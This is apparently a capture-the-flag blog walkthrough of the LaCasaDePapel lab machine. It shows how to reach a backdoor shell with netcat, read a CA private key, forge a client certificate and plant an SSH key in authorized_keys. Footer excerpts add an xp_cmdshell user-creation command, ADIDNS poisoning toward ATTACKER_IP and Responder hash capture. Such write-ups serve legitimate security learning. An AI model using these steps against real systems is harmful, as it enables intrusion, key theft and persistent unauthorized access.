Skip to main content

Creating Self Signed Certificate

By

Some times,we need a Self signed certificate. So, to create it we need the CA's website.cer file and CA's private key.


lets download the ca certificate from the website

 Import the certificate and save it




Lets start creating a new certificate:

Example from LaCasaDePapel

rlwrap nc 10.10.10.131 6200 //gets a responsive shell

scandir("/home/berin")

 file_get_contents("/home/nairobi/ca.key")


Lets vertify the private key we have matches the certificate we have.

openssl pkey -in ca.key -pubout

-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAz3M6VN7OD5sHW+zCbIv/
5vJpuaxJF3A5q2rVQJNqU1sFsbnaPxRbFgAtc8hVeMNii2nCFO8PGGs9P9pvoy8e
8DR9ksBQYyXqOZZ8/rsdxwfjYVgv+a3UbJNO4e9Sd3b8GL+4XIzzSi3EZbl7dlsO
hl4+KB4cM4hNhE5B4K8UKe4wfKS/ekgyCRTRENVqqd3izZzz232yyzFvDGEOFJVz
mhlHVypqsfS9rKUVESPHczaEQld3kupVrt/mBqwuKe99sluQzORqO1xMqbNgb55Z
D66vQBSkN2PwBeiRPBRNXfnWla3Gkabukpu9xR9o+l7ut13PXdQ/fPflLDwnu5wM
ZwIDAQAB
-----END PUBLIC KEY-----


openssl x509 -in lacasadepapelhtb.crt -pubkey -noout

openssl x509 -in lacasadepapelhtb.crt -pubkey -noout both of them match, so the private key(ca.key). So, we have the private key from the cerfificate authroity to trust this server. we can be use this to create a client certificate




lets create a Client.key

Creating a Client Key:

openssl genrsa -out client.key 4096


Creating a certificate signing request

openssl req -new -key client.key -out client.csr


openssl x509 -req -in client.csr -CA web.crt -CAkey ca.key -set_serial 9001 -extensions client -days 9002 -outform PEM -out client.cer



This is the list of files that we got as of now.





firefox doesnt accept this, it has to be pkcs12, so we need to convert this,,

openssl pkcs12 -export -inkey client.key -in client.cer -out client.p12



client.p12 is a combination of client.key and client.cer
client.cer is just the signed version of client.csr



  go to firefox → certificates → your certificates → import


Add the certificate → ok



  Go to Authorities → import -->

  select the certificate that you downloaded from the website → ok

click on edit Trust → tick both the options 


Now if you try accessing the website, you can get into it without any problem..

==================================================


Creating our own SSH key to add it into Authorized keys to get a shell


create our own ssh key
 ssh-keygen

two files will be created


copy id_rsa.pub key

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDJUte6FKs4uwuYNVjXL6bbMtfo+e/sg6aCTZQSFfi+Skb1Tax/NuROjmGAI/qWeoan0E5MhwozUkP/f+6Oqe3Uy2bBbUQclb/MAkOy5RZzUflZA4kCRaOwyCmG9m1IqhiETj/m1MNuRC+srOk93Wzcsdd7HBefhLap4sMlX1KQ+ZxYTcj+2CiyihiTcuIqgxlJo1fi2RiIVkL2KLwC4YWckcNL6QLkU5K9b0hgGsZmir7zNze2F0RYCU5NTikt4CmUYy7ogdi/0OH/N8FjMFSi70jQIw2fVMgB0ggzmmdyasjGb6MTt3I8RmbGik6diaGHmdFLKd3A49dFd3wHCHW/ root@kali



rlwrap nc 10.10.10.131 6200
scandir("/home/dali/.ssh")


file_put_contents("/home/dali/.ssh/authorized_keys","ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDJUte6FKs4uwuYNVjXL6bbMtfo+e/sg6aCTZQSFfi+Skb1Tax/NuROjmGAI/qWeoan0E5MhwozUkP/f+6Oqe3Uy2bBbUQclb/MAkOy5RZzUflZA4kCRaOwyCmG9m1IqhiETj/m1MNuRC+srOk93Wzcsdd7HBefhLap4sMlX1KQ+ZxYTcj+2CiyihiTcuIqgxlJo1fi2RiIVkL2KLwC4YWckcNL6QLkU5K9b0hgGsZmir7zNze2F0RYCU5NTikt4CmUYy7ogdi/0OH/N8FjMFSi70jQIw2fVMgB0ggzmmdyasjGb6MTt3I8RmbGik6diaGHmdFLKd3A49dFd3wHCHW/ root@kali")


or else file append to add the data after it instead of replace the data in the file.


file_put_contents("/home/dali/.ssh/authorized_keys","ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDJUte6FKs4uwuYNVjXL6bbMtfo+e/sg6aCTZQSFfi+Skb1Tax/NuROjmGAI/qWeoan0E5MhwozUkP/f+6Oqe3Uy2bBbUQclb/MAkOy5RZzUflZA4kCRaOwyCmG9m1IqhiETj/m1MNuRC+srOk93Wzcsdd7HBefhLap4sMlX1KQ+ZxYTcj+2CiyihiTcuIqgxlJo1fi2RiIVkL2KLwC4YWckcNL6QLkU5K9b0hgGsZmir7zNze2F0RYCU5NTikt4CmUYy7ogdi/0OH/N8FjMFSi70jQIw2fVMgB0ggzmmdyasjGb6MTt3I8RmbGik6diaGHmdFLKd3A49dFd3wHCHW/ root@kali", FILE_APPEND)




file_get_contents("/home/dali/.ssh/authorized_keys")




chmod 600 id_rsa
ssh -i id_rsa dali@10.10.10.131












Comments

Post a Comment

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

By
1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds
8 comments
Read more

Windows Priv Escallation

By
1.     Windows Privilege Escalation Commands  _ new 2.     Transferring Files to Windows 3.    Priv Esc Commands 4.    Priv Esc Guide  5.    Payload All the Things --> great Coverage 6.    WinRM -- Windows Priv Esc    7. Newb Guide - Windows Pentest    8. Kerberos Attacks Explained     9. How to Attack Kerberos 101    Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info check for Non-windows processes in windows using netstat Step 1: Check net user and admin and user rights Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1. Step 3: Try to get Meterpreter. Step 4: Load mimikatz ,try bypass UAC , check SAM SYSTEM etc. Step 5: check for weird programs and registry. Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD Enum & Kerberos Enum - Bruteforce   Atacking AD with LDAP & kerberos      Step 7: Got Creds - try psexec.py or crackm
1 comment
Read more

Relay Attacks

By
Hash Hashcat Attack method LM 3000 crack/pass the hash NTLM/NTHash 1000 crack/pass the hash NTLMv1/Net-NTLMv1 5500 crack/relay attack NTLMv2/Net-NTLMv2 5600 crack/relay attack Abusing ADIDNS to Send traffic to the target #Send DNS traffic to the attacker machine, so that we can relay the traffic and gain access to target machines/hashes Import-Module ./ Powermad.ps1 PowerShell New-ADIDNSNode -Node * -Data 'ATTACKER_IP' -Verbose #assign permissions to the ADIDNS Powershell Grant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -Verbose Capturing Hashes using responder and cracking hashes #Find the interface of the IP (see via route table) ip route get 10.10.10.10 #start responder sudo proxychains responder -I tun0 -v #Start responder with WPAD Enabled and try to download NTLM hashes if any found python3 Responder.py -I ens160 -wFb -v --lm --disable-ess #Crack the hashes using hashcat hashcat -m 5600 -a 0 hash rockyou.txt -r /usr/share/
3 comments
Read more